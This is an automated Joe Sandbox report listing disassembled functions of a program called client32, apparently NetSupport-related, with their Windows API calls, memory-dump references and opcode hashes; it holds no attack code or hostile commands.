                                                                                                                                                                                                    • Associated: 00000007.00000002.4097511143.0000000068884000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097532016.0000000068886000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097551046.0000000068889000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_687d0000_client32.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Value$Exception$Concurrency::unsupported_os::unsupported_osRaiseThrowstd::exception::exception
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1973407479-0
                                                                                                                                                                                                    • Opcode ID: 19579b08c8bc7c73f8af1768df4eb6b7d32be232190545ca9ed97414b08d262b
                                                                                                                                                                                                    • Instruction ID: 8f82e27819394ad15b22afc824ab3ff8b9818781b40a41823e370bfbc8efc55c
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 19579b08c8bc7c73f8af1768df4eb6b7d32be232190545ca9ed97414b08d262b
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9701F271641214EFCB21AB69CC68A9DF7B4EF46358B810966E46683250DF30A901CBC1
                                                                                                                                                                                                    Function 11131380 Relevance: 6.0, APIs: 4, Instructions: 43COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • SystemParametersInfoA.USER32(00000029,00000154,?,00000000), ref: 111313B1
                                                                                                                                                                                                    • CreateFontIndirectA.GDI32(?), ref: 111313CF
                                                                                                                                                                                                    • CreateFontIndirectA.GDI32(?), ref: 111313E5
                                                                                                                                                                                                    • CreateFontIndirectA.GDI32(FFFFFFF0), ref: 111313FB
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CreateFontIndirect$InfoParametersSystem
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3386289337-0
                                                                                                                                                                                                    • Opcode ID: cddf9315703bad504045fd98c9e1cfe8d04d1f92840bc27388ccda177a2b43ee
                                                                                                                                                                                                    • Instruction ID: e4efc710e3e979ce8ff1f48ebad8b7127cba25ea1afedff09802414c266bcb73
                                                                                                                                                                                                    • Opcode Fuzzy Hash: cddf9315703bad504045fd98c9e1cfe8d04d1f92840bc27388ccda177a2b43ee
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 92015E719007189BD7A0DFA9DC44BDAF7F9AB84310F1042AAD519A6290DB706988CF51
                                                                                                                                                                                                    Function 68832915 Relevance: 6.0, APIs: 4, Instructions: 42COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _errno.MSVCR100(00000000,00000000,?,68832A8B,?,000000FF,?,00000000,00000000), ref: 68832922
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR100(00000000,00000000,?,68832A8B,?,000000FF,?,00000000,00000000), ref: 6883292D
                                                                                                                                                                                                      • Part of subcall function 6885AF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6882B6CF,?,6882C24B,00000003,688074A4,687EA948,0000000C,688074F7,00000001,00000001), ref: 6885AF85
                                                                                                                                                                                                    • free.MSVCR100(00000000,00000002,00000000,00000000,00000000,00000000,00000000,00000000), ref: 68832971
                                                                                                                                                                                                    • free.MSVCR100(00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000000,00000000), ref: 68832979
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4097447824.00000000687D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 687D0000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097426862.00000000687D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097511143.0000000068884000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097532016.0000000068886000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097551046.0000000068889000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_687d0000_client32.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: free$_errno_invalid_parameter_invalid_parameter_noinfo
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 4554520-0
                                                                                                                                                                                                    • Opcode ID: 7cce8eb0cc32eb52d18113ebcda93601ad73d19730f340396eb66d676776fd7b
                                                                                                                                                                                                    • Instruction ID: 6d2fbe8bf349e1dbd8227efbfb5f5bdb43d2781be213873aff4afb97ea765144
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7cce8eb0cc32eb52d18113ebcda93601ad73d19730f340396eb66d676776fd7b
                                                                                                                                                                                                    • Instruction Fuzzy Hash: D9016D7580012CFBCF015FE4CD09EED7B69AF04368F904650B924691A0E7718AA0DBA1
                                                                                                                                                                                                    Function 6882AAE1 Relevance: 6.0, APIs: 4, Instructions: 39threadCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,-00000018,68820EC3,00010000,68820EB1,?), ref: 6882AB1D
                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 6882AB27
                                                                                                                                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000), ref: 6882AB3F
                                                                                                                                                                                                    • _CxxThrowException.MSVCR100(?,68880C48,00000000), ref: 6882AB4D
                                                                                                                                                                                                      • Part of subcall function 6882AA54: GetModuleHandleA.KERNEL32(00000000), ref: 6882AA6B
                                                                                                                                                                                                      • Part of subcall function 6882AA54: GetModuleFileNameW.KERNEL32(687D0000,?,00000104), ref: 6882AA87
                                                                                                                                                                                                      • Part of subcall function 6882AA54: LoadLibraryW.KERNEL32(?), ref: 6882AA98
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4097447824.00000000687D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 687D0000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097426862.00000000687D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097511143.0000000068884000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097532016.0000000068886000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097551046.0000000068889000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_687d0000_client32.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Module$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorExceptionFileHandleLastLibraryLoadNameThreadThrow
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 488853443-0
                                                                                                                                                                                                    • Opcode ID: c2d35d0d4091c9e807e4e9f786531e43e7e96a2bb601ec9c6e715e709f8974eb
                                                                                                                                                                                                    • Instruction ID: d7811d8cb5164f17b14287952dea5135286c795d9335dff9aedc47790a5b4400
                                                                                                                                                                                                    • Opcode Fuzzy Hash: c2d35d0d4091c9e807e4e9f786531e43e7e96a2bb601ec9c6e715e709f8974eb
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 97F02D31640106EBDF08AFA8CC15AAE3B2AFF01300F800838FA26E6050CB35C915DBA1
                                                                                                                                                                                                    Function 687E08D2 Relevance: 6.0, APIs: 4, Instructions: 35COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4097447824.00000000687D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 687D0000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097426862.00000000687D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097511143.0000000068884000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097532016.0000000068886000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097551046.0000000068889000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_687d0000_client32.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno$_invalid_parameter_noinfo_memmove
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3898388434-0
                                                                                                                                                                                                    • Opcode ID: e9982ba919b5cd3db2891b3bdaf6a90660425bbe22dff51734183ff52d4c84de
                                                                                                                                                                                                    • Instruction ID: 7d7d5beab7f1774b4ee43733ca5fd0fce4730ba73ed6f5a51db26637b8a58305
                                                                                                                                                                                                    • Opcode Fuzzy Hash: e9982ba919b5cd3db2891b3bdaf6a90660425bbe22dff51734183ff52d4c84de
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 98F0A77154530DEBEB215E5DED4C7AA3794BF04758F804436F82896160DB70D850C7F1
                                                                                                                                                                                                    Function 687EA864 Relevance: 6.0, APIs: 4, Instructions: 32COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _lock_file.MSVCR100(?,?,?,?,?,?,?,687EA8C0,0000000C), ref: 687EA891
                                                                                                                                                                                                      • Part of subcall function 687EA48D: _lock.MSVCR100(?,?,?,68836E10,00000040,68836E48,0000000C,68808676,00000000,?), ref: 687EA4BA
                                                                                                                                                                                                    • _fclose_nolock.MSVCR100(?,?,?,?,?,?,?,687EA8C0,0000000C), ref: 687EA89C
                                                                                                                                                                                                      • Part of subcall function 687EA80F: __freebuf.LIBCMT ref: 687EA833
                                                                                                                                                                                                      • Part of subcall function 687EA80F: _fileno.MSVCR100(?,?,?), ref: 687EA839
                                                                                                                                                                                                      • Part of subcall function 687EA80F: _close.MSVCR100(00000000,?,?,?), ref: 687EA83F
                                                                                                                                                                                                      • Part of subcall function 687EA8DC: _unlock_file.MSVCR100(?,687EA8B1,?,?,?,?,?,?,687EA8C0,0000000C), ref: 687EA8DD
                                                                                                                                                                                                    • _errno.MSVCR100(?,?,?,?,?,?,687EA8C0,0000000C), ref: 68808BC3
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR100(?,?,?,?,?,?,687EA8C0,0000000C), ref: 68808BCE
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4097447824.00000000687D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 687D0000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097426862.00000000687D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097511143.0000000068884000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097532016.0000000068886000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097551046.0000000068889000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_687d0000_client32.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: __freebuf_close_errno_fclose_nolock_fileno_invalid_parameter_noinfo_lock_lock_file_unlock_file
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1403730806-0
                                                                                                                                                                                                    • Opcode ID: 9887ac4b772fa256cecc8e85f018f525a9f1bd4797821bc2492df575557c3336
                                                                                                                                                                                                    • Instruction ID: c2467e6ec93c3b64ff2925d497c862f381a8be244da4c52224c6d5363fadb4f8
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9887ac4b772fa256cecc8e85f018f525a9f1bd4797821bc2492df575557c3336
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8DF062748417099AE7119B78994C76EB7B06F11338F908604A434BA0C0CB3846424FB5
                                                                                                                                                                                                    Function 687EC9C1 Relevance: 6.0, APIs: 4, Instructions: 29COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4097447824.00000000687D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 687D0000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097426862.00000000687D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097511143.0000000068884000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097532016.0000000068886000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097551046.0000000068889000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_687d0000_client32.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno$_invalid_parameter_noinfo_wfsopen
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 972587971-0
                                                                                                                                                                                                    • Opcode ID: 80a578632935dee6ef77630ccfa365ade4c2e455c04d7789f8367b117b433f30
                                                                                                                                                                                                    • Instruction ID: 50debf5fd8fb97030de11cb96f21df7653b2a9d17c2d0b5d395b2bdf660a7a71
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 80a578632935dee6ef77630ccfa365ade4c2e455c04d7789f8367b117b433f30
                                                                                                                                                                                                    • Instruction Fuzzy Hash: CBE0D83A664619EBDB115F5CDD08AAA3B98AF45B58F804421F854AF210DF71D82087F0
                                                                                                                                                                                                    Function 110071D5 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185windowCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 1110C420: wsprintfA.USER32 ref: 1110C454
                                                                                                                                                                                                      • Part of subcall function 1110C420: _memset.LIBCMT ref: 1110C477
                                                                                                                                                                                                    • CreateWindowExA.USER32(00000000,edit,00000000,40040004,?,?,?,?,?,00000002,00000000,?), ref: 11007327
                                                                                                                                                                                                    • SetFocus.USER32(?), ref: 11007383
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CreateFocusWindow_memsetwsprintf
                                                                                                                                                                                                    • String ID: edit
                                                                                                                                                                                                    • API String ID: 133491855-2167791130
                                                                                                                                                                                                    • Opcode ID: f65e150b113dac071697823f5246cea45f0e0d9d2d8fe942133c289e5f9292e4
                                                                                                                                                                                                    • Instruction ID: f78834b4020d8e2e6f829c6f5032a1a8cba214c943ee8e0f2be50220b25a4479
                                                                                                                                                                                                    • Opcode Fuzzy Hash: f65e150b113dac071697823f5246cea45f0e0d9d2d8fe942133c289e5f9292e4
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4851B0B5A00606AFE741CFA8DC80BABB7E5FB48354F11856DF995C7340EA34A942CB61
                                                                                                                                                                                                    Function 1103F270 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 170COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 110948B0: GetSystemMetrics.USER32(0000004C), ref: 110948BE
                                                                                                                                                                                                      • Part of subcall function 110948B0: GetSystemMetrics.USER32(0000004D), ref: 110948C7
                                                                                                                                                                                                      • Part of subcall function 110948B0: GetSystemMetrics.USER32(0000004E), ref: 110948CE
                                                                                                                                                                                                      • Part of subcall function 110948B0: GetSystemMetrics.USER32(00000000), ref: 110948D7
                                                                                                                                                                                                      • Part of subcall function 110948B0: GetSystemMetrics.USER32(0000004F), ref: 110948DD
                                                                                                                                                                                                      • Part of subcall function 110948B0: GetSystemMetrics.USER32(00000001), ref: 110948E5
                                                                                                                                                                                                    • GetRegionData.GDI32(?,00001000,?), ref: 1103F2D5
                                                                                                                                                                                                      • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                                                                                                      • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                                                                                                      • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                                                                                                      • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: MetricsSystem$DataErrorExitLastMessageProcessRegionwsprintf
                                                                                                                                                                                                    • String ID: IsA()$e:\nsmsrc\nsm\1210\1210f\ctl32\DataStream.h
                                                                                                                                                                                                    • API String ID: 1231476184-2270926670
                                                                                                                                                                                                    • Opcode ID: bcf8010bd49bb8a48e5ff97e5ecb267e14ecb5a38bedc9232b3b103d8f10203e
                                                                                                                                                                                                    • Instruction ID: 7bd6763c5981859c823165d8063a1c4bf52d6bb4432795ccb6ce09120d22f5b2
                                                                                                                                                                                                    • Opcode Fuzzy Hash: bcf8010bd49bb8a48e5ff97e5ecb267e14ecb5a38bedc9232b3b103d8f10203e
                                                                                                                                                                                                    • Instruction Fuzzy Hash: C2613DB5E001AA9FCB24CF54CD84ADDF3B5BF88304F0082D9E689A7244DAB46E85CF51
                                                                                                                                                                                                    Function 110BD560 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 130comCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 110758B0: GlobalAddAtomA.KERNEL32(NSMCoolbar), ref: 11075905
                                                                                                                                                                                                      • Part of subcall function 110758B0: GetSysColor.USER32 ref: 11075923
                                                                                                                                                                                                      • Part of subcall function 110758B0: GetSysColor.USER32(00000014), ref: 1107592A
                                                                                                                                                                                                      • Part of subcall function 110758B0: GetSysColor.USER32(00000010), ref: 11075931
                                                                                                                                                                                                      • Part of subcall function 110758B0: GetSysColor.USER32(00000008), ref: 11075938
                                                                                                                                                                                                      • Part of subcall function 110758B0: GetSysColor.USER32(00000016), ref: 1107593F
                                                                                                                                                                                                      • Part of subcall function 110AE730: InitializeCriticalSection.KERNEL32(00000154,00000000,110BD632,24DE4E77,00000000,00000000,00000000,00000000,00000000,111819F4,000000FF,?,1105D27F,?), ref: 110AE741
                                                                                                                                                                                                      • Part of subcall function 1110D060: GetCurrentThreadId.KERNEL32 ref: 1110D0F6
                                                                                                                                                                                                      • Part of subcall function 1110D060: InitializeCriticalSection.KERNEL32(-00000010,?,000000FF,?,11026F57,00000001,000003F0), ref: 1110D109
                                                                                                                                                                                                      • Part of subcall function 1110D060: InitializeCriticalSection.KERNEL32(111EC8A0,?,000000FF,?,11026F57,00000001,000003F0), ref: 1110D118
                                                                                                                                                                                                      • Part of subcall function 1110D060: EnterCriticalSection.KERNEL32(111EC8A0,?,000000FF,?,11026F57), ref: 1110D12C
                                                                                                                                                                                                      • Part of subcall function 1110D060: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,000000FF,?,11026F57), ref: 1110D152
                                                                                                                                                                                                    • OleInitialize.OLE32(00000000), ref: 110BD6C2
                                                                                                                                                                                                      • Part of subcall function 110CA340: InterlockedIncrement.KERNEL32(111E2E04), ref: 110CA348
                                                                                                                                                                                                      • Part of subcall function 110CA340: CoInitialize.OLE32(00000000), ref: 110CA36C
                                                                                                                                                                                                    • GlobalAddAtomA.KERNEL32(NSMCobrowse), ref: 110BD715
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
